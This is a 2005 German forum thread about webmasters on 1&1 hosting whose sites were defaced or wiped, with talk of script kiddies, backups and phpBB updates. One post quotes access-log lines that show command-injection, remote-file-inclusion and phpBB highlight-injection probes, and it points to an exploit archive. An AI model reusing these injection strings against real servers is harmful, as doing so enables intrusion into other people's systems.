1&1-Hacker unterwegs?

[Pompom]

Die Wahrscheinlichkeit, dass die Mitbewerber so nett sind, ist gering.

Die Wahrscheinlichkeit, dass Scriptkiddies sich beweisen wollen, ist sicher bedeutend größer.
Und Angriffe auf Server mit vorgefertigten Exploits stellen kein Problem mehr da.
Jeder Server wird mittlerweile pro Tag mehrfach abgescant.

Anbei ein kleines Beispiel aus dem Log:
.french-connexion.com - - [03/Aug/2005:00:45:21 +0200] "GET /includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /gallery/includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /gallery/last_gallery.php?YAPIG_PATH=https://boink.zander.ch/&cmd=echo%20jSVowMsd
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /perl/includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
163.92.64.reverse.layeredtech.com - - [03/Aug/2005:00:45:27 +0200] "GET /pet.php&highlight='.system(getenv(HTTP_PHP)).'

Um sich etwas über die "Werkzeuge des Bösen" zu informieren, bieten sich
die Verteilerplattformen, z.B. https://www.milw0rm.com/
an.

[OnkelHotte]

Ich lass auf Root Servern nur noch ssh und httpd laufen. Mail macht ein anderer Server, der vom Provider 24/7 gehostet wird und sich in einem anderen Class-C Netz befindet.

[www.wittis-web.de]

hmm..

ich reih mich mal ein

gerade durfte ich mein backup von game-fire hochziehen ...

der hat zwar nur die index gelsöcht ... und gegen einen text getauscht,. aber egal ...

[Burgtour]

Hab das Problem auch nicht, Seite läuft bestens, bis auf einige Kleinigkeiten.

[Pompom]

Burgtour,

dass du das Problem nicht hast, liegt nicht an Dir und deinem Forum, sondern daran, daß bisher kein Interessent mit dem entsprechenden Exploit auf dein Forum aufmerksam geworden ist.

[mmmichael2]

Für angemietete ROOT-Sever, welche bei 1&1 stehen, kümmert sich 1&1 um komplette und automatisierte Server-Backups für ca. 10 EUR pro Monat. Bei virtuellem Hosting liegt die Backup-Pflicht so wie so beim Provider.

Hi,

bei "Root Servern" ist man selbst für Backups verantwortlich. Darüberhinaus gibt es IHMO keine direkten Backuppflichten für Provider, wenn dies nicht explizit vereinbart wurde.

Gruß
Michael

[marc75]

ich glaube nicht das hard_p. ein rootserver hat, sonst hätte er das mit dem register_globals kaum geschrieben.

[lomo]

bei "Root Servern" ist man selbst für Backups verantwortlich.

Wenn ich für den sicheren Betrieb eines AKWs vearntwortlich wäre, könnte ich ich mich sicherlich auch vor die Atombrennstäbe hinsetzen und darauf blasen, um die zu kühlen, oder alternativ ein paar Leute bezahlen, die es sicher und zuverlässig machen.

[Garfield]

Hab das Problem auch nicht, Seite läuft bestens, bis auf einige Kleinigkeiten.

Du solltest allerdings dringendst updaten auf die aktuellste phpbb-Version.

[workershop]

@ hard_pollux

Uns wurde am Dienstag die ganze Datenbank gelöscht. Update gerade das Forum auf die neueste Version. Der Angriff kann aber auch über irgendwelche Eingabescripte gekommen sein.

Das Lustige bei 1und1 ist das, das die Dame von der Telefonhotline mir gesagt hatte, das Sie kein Backup haben, weil das meine Sache ist. ich hatte dann nochmal an den Support per Mail geschrieben, und mich beschwert und siehe da, am Donnerstag hatte ich auf dem Server ein Backup meiner Datenbank vom Dienstag früh.


Ronny

[chulian]

Die Wahrscheinlichkeit, dass Scriptkiddies sich beweisen wollen, ist sicher bedeutend größer.
Und Angriffe auf Server mit vorgefertigten Exploits stellen kein Problem mehr da.

Stimmt... ist mir neulich auch mal passiert.

https://haftbar.de/2005/08/11/hackbsd-c ... y0u-jank0/

man wird halt vorsichtiger...